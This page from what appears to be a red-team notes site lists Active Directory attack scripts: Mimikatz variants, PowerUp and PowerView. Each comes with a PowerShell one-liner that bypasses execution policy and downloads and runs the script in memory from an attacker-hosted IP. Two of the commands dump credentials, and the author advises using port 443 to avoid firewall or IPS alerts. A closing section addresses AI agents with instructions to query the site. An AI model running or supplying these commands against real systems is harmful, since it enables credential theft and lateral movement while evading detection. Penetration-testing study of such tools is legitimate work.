# Important Scripts & Links

These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is a major overlap with the previous section, however the major difference here is that this is simply a list of scripts along with their usage and commands (if required). On the other hand, the previous section is based out of need/requirement and the best script/command that can be useful. 

The heading to the tool gives a gist of its use and the section contains 2 parts,

* Link to download the script
* Command to download the script locally and execute it from memory

I have following the method of downloading the scripts to a local repo and then using them in the powershell command to download & execute since the targetted machines may not have internet. 

I have also used 443 in the http link since I use either 80/443 for all such activities to avoid any alarms the firewall/IPS may raise. You can change it to the port from which you host the scripts. 

## Scripts

<details>

<summary>Invoke-MassMimikatz.ps1 # Dump Credentials on remote host</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1>

```
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
```

</details>

<details>

<summary>Invoke-Mimikatz.ps1 # Dump Credentials from Memory</summary>

<https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1>

```
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
```

</details>

<details>

<summary>PowerUp.ps1 #Privilege Escalation Checks</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1>

```
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.119.208:443/PowerUp.ps1’);Invoke-AllChecks”
```

</details>

<details>

<summary>PowerView.ps1 #Network &#x26; AD Exploration</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1>

```
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/powerview.ps1')"
```

Read more about the commands,

<https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon>

</details>

## Links

{% embed url="<https://wadcoms.github.io/#+Exploitation+Windows+No%20Creds+SMB>" %}

{% embed url="<https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-active-directory.md#AD-Lateral-Movement-1>" %}

<https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://docs.particle42.com/active-directory/all-commands-tools-and-scripts/important-scripts-and-links.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.